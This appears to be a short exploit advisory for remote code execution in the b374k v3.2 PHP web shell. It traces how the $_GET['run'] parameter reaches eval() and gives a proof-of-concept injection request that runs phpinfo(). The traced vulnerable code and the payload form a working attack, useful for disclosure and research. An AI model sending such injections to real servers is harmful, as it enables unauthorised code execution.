[-] Exploit title : b374k v3.2 shell script remote code execution
[-] Software dl : https://github.com/b374k/b374k
[-] Date : 12-1-2018
[-] Category : Webapps
[-] Author : The_Ripper
[-] Tested on : Win XP
[-] Dork : N/A
[-] Author telegram : @The_Ripper
======================================
[-] Vulnerable page Address:
b374k-master/index.php
======================================
[-] Vulnerable Source code :
73 >> eval eval($content);
72 >> $content = trim($module_init) . "?>" . $base_code . $module_code . $layout;
58 >> $module_init = "\n\$GLOBALS['module_to_load'] = array(" . implode(", ", $module_arr) . ");";
57 >> $module_arr = array_map("packer_wrap_with_quote", $module_arr);
55 >> $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
54 >> $modules = explode(",", $_GET['run']);
22 >> $base_code .= packer_read_file($GLOBALS['packer']['base_dir'] . "main.php");
21 >> $base_code .= packer_read_file($GLOBALS['packer']['base_dir'] . "resources.php");
20 >> $base_code = "";
63 >> $module_code .= packer_read_file($filename . ".php");
23 >> $module_code = packer_read_file($GLOBALS['packer']['base_dir'] . "base.php");
62 >> $filename = $GLOBALS['packer']['module_dir'] . $module;
61 >> $module = trim($module);
60 >> foreach($modules as $module)
54 >> $modules = explode(",", $_GET['run']);
70 >> $layout = str_replace("<__JS__>", $js_code, $layout);
64 >> $js_code .= "\n" . packer_read_file($filename . ".js") . "\n";
31 >> $js_code .= "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "base.js");
30 >> $js_code = "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "sortable.js") . $js_main_code;
28 >> $js_main_code = "\n\n" . packer_read_file($GLOBALS['packer']['base_dir'] . "main.js");
62 >> $filename = $GLOBALS['packer']['module_dir'] . $module;
61 >> $module = trim($module);
60 >> foreach($modules as $module)
54 >> $modules = explode(",", $_GET['run']);
69 >> $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
27 >> $zepto_code = packer_read_file($GLOBALS['packer']['base_dir'] . "zepto.js");
68 >> $layout = str_replace("<__CSS__>", $css_code, $layout);
36 >> $css_code = packer_read_file($GLOBALS['packer']['theme_dir'] . $theme . ".css");
35 >> $theme = "default";
41 >> $layout = packer_read_file($GLOBALS['packer']['base_dir'] . "layout.php");
requires:
44 >> if(isset($_SERVER['REMOTE_ADDR']))
52 >> elseif(isset($_GET['run']))
======================================
[-] Description :
for executing your code you just need to identify an amount for
$_GET['run'] . for example :
/index.php?run=';phpinfo();//
